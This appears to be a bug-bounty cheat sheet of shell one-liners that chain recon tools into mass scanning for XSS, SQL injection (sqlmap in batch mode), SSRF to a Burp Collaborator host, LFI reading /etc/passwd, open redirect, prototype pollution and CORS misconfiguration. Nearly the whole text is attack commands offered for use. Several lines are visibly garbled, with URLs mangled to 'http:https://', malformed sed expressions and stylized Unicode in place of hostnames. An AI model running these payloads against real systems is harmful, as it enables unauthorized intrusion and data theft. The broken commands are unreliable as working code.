๐๐๐ โชผ
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ cat targets.txt | getJS | httpx --match-regex "addEventListener((?:'|")message(?:'|")"
๐๐๐๐ข โชผ
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
๐๐๐๐ โชผ
findomain -t https://target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace ๐ฉ๐ต๐ต๐ฑ:https://๐ ๐๐๐.๐ฃ๐ถ๐ณ๐ฑ๐ค๐ฐ๐ญ๐ญ๐ข๐ฃ๐ฐ๐ณ๐ข๐ต๐ฐ๐ณ.๐ฏ๐ฆ๐ต
๐๐ ๐ โชผ
gau https://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
๐๐๐๐ ๐๐๐๐๐๐๐๐ โชผ
gau https://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
๐๐๐๐๐๐๐๐๐ ๐๐๐๐๐๐๐๐๐ โชผ
subfinder -d https://target.com | httpx -silent | sed 's/$//?proto[testparam]=exploit//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"
๐๐๐๐ โชผ
gau https://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
๐๐ฑ๐ญ๐ซ๐๐๐ญ .๐ฃ๐ฌ โชผ
echo https://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 assetfinder https://vuln.target.com | waybackurls | grep -E ".json(?:onp?)?$" | anew
๐๐ฑ๐ญ๐ซ๐๐๐ญ ๐๐๐๐ฌ ๐๐ซ๐จ๐ฆ ๐๐จ๐ฆ๐ฆ๐๐ง๐ญ โชผ
cat targets.txt | html-tool comments | grep -oE '\b(https?|http):https://[-A-Za-z0-9+&@#/%?=_|!:,.;]*[-A-Za-z0-9+&@#/%=_|]'
๐๐ฎ๐ฆ๐ฉ ๐๐ง-๐ฌ๐๐จ๐ฉ๐ ๐๐ฌ๐ฌ๐๐ญ๐ฌ ๐๐ซ๐จ๐ฆ ๐๐๐๐ค๐๐ซ๐๐ง๐ โชผ
curl -sL ๐ฉ๐ต๐ต๐ฑ๐ด:https://๐จ๐ช๐ต๐ฉ๐ถ๐ฃ.๐ค๐ฐ๐ฎ/๐ข๐ณ๐ฌ๐ข๐ฅ๐ช๐บ๐ต/๐ฃ๐ฐ๐ถ๐ฏ๐ต๐บ-๐ต๐ข๐ณ๐จ๐ฆ๐ต๐ด-๐ฅ๐ข๐ต๐ข/๐ฃ๐ญ๐ฐ๐ฃ/๐ฎ๐ข๐ด๐ต๐ฆ๐ณ/๐ฅ๐ข๐ต๐ข/๐ฉ๐ข๐ค๐ฌ๐ฆ๐ณ๐ฐ๐ฏ๐ฆ_๐ฅ๐ข๐ต๐ข.๐ซ๐ด๐ฐ๐ฏ?๐ณ๐ข๐ธ=๐ต๐ณ๐ถ๐ฆ | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]
๐ ๐ข๐ง๐ ๐ฅ๐ข๐ฏ๐ ๐ก๐จ๐ฌ๐ญ/๐๐จ๐ฆ๐๐ข๐ง/๐๐ฌ๐ฌ๐๐ญ๐ฌ โชผ
subfinder -d https://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
๐๐๐ซ๐๐๐ง๐ฌ๐ก๐จ๐ญ โชผ
assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'